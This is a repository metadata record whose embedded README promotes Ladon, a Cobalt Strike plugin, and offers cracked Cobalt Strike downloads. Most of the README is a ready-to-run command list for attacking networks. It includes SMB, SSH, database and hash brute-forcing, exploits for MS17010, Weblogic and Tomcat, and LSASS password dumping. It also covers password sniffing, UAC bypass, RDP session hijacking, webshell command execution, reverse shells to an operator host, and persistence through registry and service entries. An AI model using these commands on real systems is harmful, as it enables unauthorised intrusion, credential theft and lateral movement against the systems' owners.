{"id":19951803,"url":"https://github.com/k8gege/aggressor","last_synced_at":"2026-01-26T12:35:51.579Z","repository":{"id":43956994,"uuid":"216055159","full_name":"k8gege/Aggressor","owner":"k8gege","description":"Ladon 911 for Cobalt Strike \u0026 Cracked Download,Large Network Penetration Scanner, vulnerability / exploit / detection / MS17010 / password/brute-force/psexec/atexec/sshexec/webshell/smbexec/netcat/osscan/netscan/struts2Poc/weblogicExp","archived":false,"fork":false,"pushed_at":"2022-07-28T15:12:42.000Z","size":18670,"stargazers_count":1001,"open_issues_count":20,"forks_count":192,"subscribers_count":24,"default_branch":"master","last_synced_at":"2025-01-12T06:23:38.502Z","etag":null,"topics":["aggressor-scripts","brute-force","cobalt-strike","k8cscan","ladon","osscan","portscan","scanner","subdomain","webscan"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/k8gege.png","metadata":{"files":{"readme":"README.md","changelog":"Change.log","contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-10-18T15:31:32.000Z","updated_at":"2024-12-29T13:54:51.000Z","dependencies_parsed_at":"2022-07-18T08:13:12.328Z","dependency_job_id":null,"html_url":"https://github.com/k8gege/Aggressor","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/k8gege%2FAggressor","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/k8gege%2FAggressor/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/k8gege%2FAggressor/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/rep
ositories/k8gege%2FAggressor/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/k8gege","download_url":"https://codeload.github.com/k8gege/Aggressor/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":241381645,"owners_count":19953751,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aggressor-scripts","brute-force","cobalt-strike","k8cscan","ladon","osscan","portscan","scanner","subdomain","webscan"],"created_at":"2024-11-13T01:09:46.767Z","updated_at":"2026-01-26T12:35:46.535Z","avatar_url":"https://github.com/k8gege.png","language":null,"readme":"# Ladon 911 for Cobalt Strike\n![](https://k8gege.github.io/k8img/Ladon/Dragon.jpg)\n\n[![Author](https://img.shields.io/badge/Author-k8gege-blueviolet)](https://github.com/k8gege) \n[![Ladon](https://img.shields.io/badge/Ladon-911-yellowgreen)](https://github.com/k8gege/Aggressor) \n[![Bin](https://img.shields.io/badge/Aggressor-Bin-ff69b4)](https://github.com/k8gege/Aggressor/releases) \n[![GitHub issues](https://img.shields.io/github/issues/k8gege/Aggressor)](https://github.com/k8gege/Aggressor/issues) \n[![Github Stars](https://img.shields.io/github/stars/k8gege/Aggressor)](https://github.com/k8gege/Aggressor) \n[![GitHub forks](https://img.shields.io/github/forks/k8gege/Aggressor)](https://github.com/k8gege/Aggressor)\n[![GitHub 
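license](https://img.shields.io/github/license/k8gege/Aggressor)](https://github.com/k8gege/Aggressor)\n[![Downloads](https://img.shields.io/github/downloads/k8gege/Aggressor/total?label=Release%20Download)](https://github.com/k8gege/Aggressor/releases/latest)\n\n\n### Ladon For Cobalt Strike\n\u003cimg src=https://k8gege.github.io/k8img/Ladon/CS_Ladon.gif\u003e\u003c/img\u003e\n\n### Cobalt Strike Cracked by k8gege\n\nDownLoad: https://github.com/k8gege/Aggressor/releases/tag/cs\n\n### Cobalt Strike K8 Cracked Version\nCobalt Strike 4.4\u003cbr\u003e\nCobalt Strike 4.3\u003cbr\u003e\nCobalt Strike 3.13\u003cbr\u003e\nCobalt Strike 3.12\u003cbr\u003e\n\n1. Built-in Windows TeamServer.exe launcher\n2. Built-in Ladon 7.2 plugin (Chinese and English versions)\n\n### Ladon 9.0: Turn Your Cobalt Strike into a Super Weapon\nGet the 9.0 plugin: https://mp.weixin.qq.com/s/GQBXCX1fiSLi6gKY3M-JcA\n\n#### No Screenshots, No Proof\n\nWithout further ado, here are the screenshots. Let's look at what the Ladon plugin for Cobalt Strike 4.4 can do.\n\n\nIf you are familiar with Ladon commands, you can run them directly in Beacon. For example, the “Ladon GetID” command shows the target's machine name, machine ID, CPU ID, disk ID, MAC address and similar information, which is mainly used to tell apart machines with the same name on a large internal network, among other uses. If you are not familiar with the commands, you can use the right-click menu, which is there for the convenience of newcomers and less experienced users.\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44.PNG)\n\n\nIf you are not familiar with Ladon command usage, you can also use the right-click menu, which is very convenient: select a module and fill in the target parameter (IP, URL, domain name, host name, CIDR-format IP range, etc.) to load the corresponding module and scan or probe for the information you want, for example to detect machines in a C segment that are vulnerable to MS17010.\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_9.PNG)\n\n\nInternal and external network asset discovery\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_2.PNG)\n\n\nOperating system information detection\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_3.PNG)\n\n\nVulnerability detection\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_4.PNG)\n\n\nNetwork password auditing\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_5.PNG)\n\n\nLocal host information gathering\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_6.PNG)\n\n\nLateral movement and remote execution\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_7.PNG)\n\n\nPrivilege escalation and local privilege escalation\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_8.PNG)\n\n### 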
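Program Overview\n\nLadon is a multi-threaded, plugin-based comprehensive scanner for large-network penetration testing. It includes port scanning, service identification, network asset discovery, password brute-forcing, high-risk vulnerability detection and one-click GetShell, and supports batch scanning of A/B/C segments and across network segments, as well as scanning lists of URLs, hosts and domain names. Version 7.0 has 83 built-in functional modules and 18 external modules. Using multiple protocols and methods, it quickly obtains the target network's live host IPs, computer names, workgroups, shared resources, NIC addresses, operating system versions, websites, subdomains, middleware, open services, routers, databases and other information. Vulnerability detection covers MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, the Struts2 series and others. Password brute-forcing covers 12 types, including databases (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar and others. Remote command execution includes wmiexe/psexec/atexec/sshexec/jspshell. The web fingerprinting module can identify 75 types (web applications, middleware, script types, page types). Plugin POCs are highly customizable: plugins written as .NET assemblies, DLLs (C#/Delphi/VC), PowerShell and other languages are supported, arbitrary external programs or commands can be called in batch through INI configuration, and the EXP generator can produce a vulnerability POC in one click to quickly extend scanning capability. Ladon supports plugin-based scanning in Cobalt Strike to quickly expand across an internal network for lateral movement.\n\n### Documentation\n\nID | Topic |  URL \n-|-|-\n0 | Full Ladon documentation | https://k8gege.org/Ladon\n\n### DownLoad\nNew Version: https://k8gege.org/Download \u003cbr\u003e\nAll Version: https://github.com/k8gege/Ladon/releases/\n\n\n### 0. Cobalt Strike Integration\n![](https://github.com/k8gege/K8CScan/blob/master/Images/CobaltStrike.gif)\n\n\n### Preface\n\nThis document only gives simple Ladon usage examples; usage is the same in the Cobalt Strike and PowerShell versions.\n\nFull documentation: http://k8gege.org/Ladon\n\n### Asset Scanning, Fingerprinting, Service Identification, Live Hosts, Port Scanning\n\n##### 001 Multi-protocol live host discovery (IP, machine name, MAC address, manufacturer)\nLadon 192.168.1.8/24 OnlinePC\n\n##### 002 Multi-protocol operating system identification (IP, machine name, OS version, open services)\nLadon 192.168.1.8/24 OsScan\n\n##### 003 Scan for live hosts\nLadon 192.168.1.8/24 OnlineIP\n\n##### 004 ICMP scan for live hosts\nLadon 192.168.1.8/24 Ping\n\n##### 005 Scan for the SMB vulnerability MS17010 (IP, machine name, vulnerability ID, OS version)\nLadon 192.168.1.8/24 MS17010\n\n##### 006 SMBGhost vulnerability detection, CVE-2020-0796 (IP, machine name, vulnerability ID, OS version)\nLadon 192.168.1.8/24 SMBGhost\n\n##### 007 Scan web information / HTTP services\nLadon 192.168.1.8/24 WebScan\n\n##### 008 Scan site URLs and domain names in a C segment\nLadon 192.168.1.8/24 UrlScan\n\n##### 009 Scan site URLs and domain names in a C segment\nLadon 192.168.1.8/24 SameWeb\n\n##### 010 Scan subdomains and second-level domains\nLadon baidu.com SubDomain\n\n##### 011 Resolve a domain name to IP, resolve a host name to IP\nLadon baidu.com DomainIP\nLadon baidu.com HostIP\n\n##### 012 Get information on machines in the domain\nLadon AdiDnsDump 192.168.1.8 (Domain IP)\n\n##### 013 Scan ports in a C segment, scan specified ports\nLadon 192.168.1.8/24 PortScan\nLadon 192.168.1.8 PortScan 80,445,3389\n\n##### 014 Scan web sites and CMS in a C segment (75 web fingerprints)\nLadon 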
192.168.1.8/24 WhatCMS\n\n##### 015 Scan for Cisco devices\nLadon 192.168.1.8/24 CiscoScan\nLadon http://192.168.1.8 CiscoScan\n\n##### 016 Enumerate Mssql database hosts (database IP, machine name, SQL version)\nLadon EnumMssql\n\n##### 017 Enumerate network shares \t(domain, live IP, share path)\nLadon EnumShare\n\n##### 018 Scan for LDAP servers\nLadon 192.168.1.8/24 LdapScan\n\n##### 019 Scan for FTP servers\nLadon 192.168.1.8/24 FtpScan\n\n### Brute Force / Network Authentication / Weak Passwords / Password Cracking / Databases / Website Admin Panels / Login Pages / System Logins\n\nFor a detailed walkthrough of password brute-forcing, see the SSH example: http://k8gege.org/Ladon/sshscan.html\n\n##### 020 Port 445: SMB password brute force (Windows)\nLadon 192.168.1.8/24 SmbScan\n\n##### 021 Port 135: Wmi password brute force (Windows)\nLadon 192.168.1.8/24 WmiScan\n\n##### 022 Port 389: LDAP server / AD domain password brute force (Windows)\nLadon 192.168.1.8/24 LdapScan\n\n##### 023 Port 5985: Winrm password brute force (Windows)\nLadon 192.168.1.8/24 WinrmScan.ini\n\n##### 024 Port 445: SMB NTLM hash brute force (Windows)\nLadon 192.168.1.8/24 SmbHashScan\n\n##### 025 Port 135: Wmi NTLM hash brute force (Windows)\nLadon 192.168.1.8/24 WmiHashScan\n\n##### 026 Port 22: SSH password brute force (Linux)\nLadon 192.168.1.8/24 SshScan\nLadon 192.168.1.8:22 SshScan\n\n##### 027 Port 1433: Mssql database password brute force\nLadon 192.168.1.8/24 MssqlScan\n\n##### 028 Port 1521: Oracle database password brute force\nLadon 192.168.1.8/24 OracleScan\n\n##### 029 Port 3306: Mysql database password brute force\nLadon 192.168.1.8/24 MysqlScan\n\n##### 030 Port 7001: Weblogic admin console password brute force\nLadon http://192.168.1.8:7001/console WeblogicScan\nLadon 192.168.1.8/24 WeblogicScan\n\n##### 031 Port 5900: VNC remote desktop password brute force\nLadon 192.168.1.8/24 VncScan\n\n##### 032 Port 21: FTP server password brute force\nLadon 192.168.1.8/24 FtpScan\n\n##### 033 Port 8080: Tomcat admin login password brute force\nLadon 192.168.1.8/24 TomcatScan\nLadon http://192.168.1.8:8080/manage TomcatScan\n\n##### 034 Web port: 401 basic authentication password brute force\nLadon http://192.168.1.8/login HttpBasicScan\n\n##### 035 Port 445: Impacket SMB password brute force (Windows)\nLadon 192.168.1.8/24 SmbScan.ini\n\n##### 036 Port 445: IPC password brute force (Windows)\nLadon 192.168.1.8/24 IpcScan.ini\n\n\n\n### Vulnerability Detection / Exploitation / Poc / Exp\n\n##### 037 SMB vulnerability detection (CVE-2017-0143/CVE-2017-0144)\nLadon 192.168.1.8/24 MS17010\n\n##### 038 Weblogic vulnerability detection (CVE-2019-2725/CVE-2018-2894)\nLadon 192.168.1.8/24 WeblogicPoc\n\n##### 039 PhpStudy backdoor detection (phpstudy 2016/phpstudy 
2018)\nLadon 192.168.1.8/24 PhpStudyPoc\n\n##### 040 ActiveMQ vulnerability detection (CVE-2016-3088)\nLadon 192.168.1.8/24 ActivemqPoc\n\n##### 041 Tomcat vulnerability detection (CVE-2017-12615)\nLadon 192.168.1.8/24 TomcatPoc\n\n##### 042 Weblogic exploitation (CVE-2019-2725)\nLadon 192.168.1.8/24 WeblogicExp\n\n##### 043 Tomcat exploitation (CVE-2017-12615)\nLadon 192.168.1.8/24 TomcatExp\n\n##### 044 Struts2 vulnerability detection (S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)\nLadon 192.168.1.8/24 Struts2Poc\n\n\n\n### FTP Download, HTTP Download\n\n##### 045 HTTP download\nLadon HttpDownLoad http://k8gege.org/Download/Ladon.rar\n\n##### 046 FTP download \t\nLadon FtpDownLoad 127.0.0.1:21 admin admin test.exe\n\n### Encoding and Decoding (HEX/Base64)\n\n##### 047 Hex encoding and decoding\n\nLadon 123456 EnHex\nLadon 313233343536 DeHex\n\n##### 048 Base64 encoding and decoding\n\nLadon 123456 EnBase64\nLadon MTIzNDU2 DeBase64\n\n### Network Sniffing\n\n##### 049 FTP password sniffing \t\nLadon FtpSniffer 192.168.1.5\n\n##### 050 HTTP password sniffing \t\nLadon HTTPSniffer 192.168.1.5\n\n##### 051 Network sniffing\t\nLadon Sniffer\n\n### Password Retrieval\n\n##### 052 Read IIS site passwords and website paths\nLadon IISpwd\n\n##### DumpLsass: dump passwords from memory \t\nLadon DumpLsass\n\n### Information Gathering\n\n##### 053 Detailed process information \t\nLadon EnumProcess\nLadon Tasklist\n\n##### 054 Get command-line arguments \t\nLadon cmdline\nLadon cmdline cmd.exe\n\n##### 055 Get basic information for penetration testing \t\nLadon GetInfo\nLadon GetInfo2\n\n##### 056 .NET \u0026 PowerShell versions \t\nLadon NetVer\nLadon PSver\nLadon NetVersion\nLadon PSversion\n\n##### 057 Runtime version \u0026 build environment \t\nLadon Ver\nLadon Version\n\n### Remote Execution (psexec/wmiexec/atexec/sshexec)\n\n##### Port 445: PSEXEC remote command execution (interactive)\n\nnet user \\\\192.168.1.8 k8gege520 /user:k8gege\nLadon psexec 192.168.1.8\npsexec\u003e whoami\nnt authority\\system\n\n##### 058 Port 135: WmiExec remote command execution (non-interactive)\nLadon wmiexec 192.168.1.8 k8gege k8gege520 whoami\n\n##### 059 Port 445: AtExec remote command execution (non-interactive)\nLadon wmiexec 192.168.1.8 k8gege k8gege520 whoami\n\n##### 060 Port 22: SshExec remote command execution (non-interactive)\nLadon SshExec 192.168.1.8 k8gege k8gege520 whoami\nLadon SshExec 192.168.1.8 22 k8gege k8gege520 whoami\n\n##### 061 JspShell remote command execution (non-interactive)\nUsage: Ladon JspShell type url pwd cmd\nExample: Ladon 
JspShell ua http://192.168.1.8/shell.jsp Ladon whoami\n\n#### 062 WebShell remote command execution (non-interactive)\n```Bash\nUsage：Ladon WebShell ScriptType ShellType url pwd cmd\nExample: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami\nExample: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami\nExample: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami\n```\n\n### Privilege Escalation and De-escalation\n\n##### 063 BypassUac: run bypassing UAC, supports Win7-Win10 \t\nLadon BypassUac c:\\1.exe\nLadon BypassUac c:\\1.bat\n\n##### 064 GetSystem: run a program with elevated or lowered privileges \t\nLadon GetSystem cmd.exe\nLadon GetSystem cmd.exe explorer\n\n##### 065 Runas: run a command as another user \t\nLadon Runas user pass cmd\n\n### Other Functions\n\n##### 066 Enable .net 3.5 in one step\t\nLadon EnableDotNet\n\n##### 067 Get the HTML source of an internal site \t\nLadon gethtml http://192.168.1.1\n\n##### 068 Check for backdoors\nLadon CheckDoor\nLadon AutoRun\n\n##### 069 Get the local host's internal and external IP \t\nLadon GetIP\n\n##### 070 One-step mini web server \t\nLadon WebSer 80\nLadon web 80\n\n### Reverse Shell\n\n##### 071 Reverse TCP NC shell\nLadon ReverseTcp 192.168.1.8 4444 nc\n\n##### 072 Reverse TCP MSF shell\nLadon ReverseTcp 192.168.1.8 4444 shell\n\n##### 073 Reverse TCP MSF MET shell\nLadon ReverseTcp 192.168.1.8 4444 meter\n\n##### 074 Reverse HTTP MSF MET shell\nLadon ReverseHttp 192.168.1.8 4444\n\n##### 075 Reverse HTTPS MSF MET shell\nLadon ReverseHttps 192.168.1.8 4444\n\n##### 076 Reverse TCP CMD \u0026 PowerShell shell\nLadon PowerCat -r 192.168.1.8 4444 cmd\nLadon PowerCat -r 192.168.1.8 4444 psh\n\n##### 077 Reverse UDP Cmd \u0026 PowerShell shell\nLadon PowerCat -r 192.168.1.110 4444 cmd -u\nLadon PowerCat -r 192.168.1.8 4444 psh -u\n\n##### 078 RDP desktop session hijacking (no password required)\nLadon RDPHijack 3\nLadon RDPHijack 3 console\n\n##### 079 Locate multi-homed hosts via OXID\nLadon 192.168.1.8/24 EthScan\nLadon 192.168.1.8/24 OxidScan\n\n#### 080 View the user's recently accessed files\nLadon Recent\n\n#### 081 Add a registry Run startup entry\nLadon RegAuto Test c:\\123.exe\n\n#### 082 Run a program via AT scheduling (no time needed) (system privileges)\nLadon at c:\\123.exe\nLadon at c:\\123.exe gui\n\n#### 083 Add a startup entry via SC service \u0026 run a program (system privileges)\nLadon sc c:\\123.exe\nLadon sc c:\\123.exe gui\nLadon sc c:\\123.exe auto 
ServerName\n\n### Tool Download\n\nPrevious versions: https://github.com/k8gege/Ladon/releases\n\n### Latest Version\nThe latest version is in Xiaomiquan (小密圈): http://k8gege.org/Ladon/update.txt\n\u003cdiv style=\"text-align: center; width: 710px; border: green solid 0px;\"\u003e\n\u003cimg alt=\"\" src=\"http://k8gege.org/img/k8team.jpg\" style=\"display: inline-block;width: 250px;height: 300px;\" /\u003e\n\u003c/div\u003e\n\n## Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/k8gege/Aggressor.svg)](https://starchart.cc/k8gege/Aggressor)\n\n\u003cimg align='right' src=\"https://profile-counter.glitch.me/Aggressor/count.svg\" width=\"200\"\u003e\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fk8gege%2Faggressor","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fk8gege%2Faggressor","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fk8gege%2Faggressor/lists"}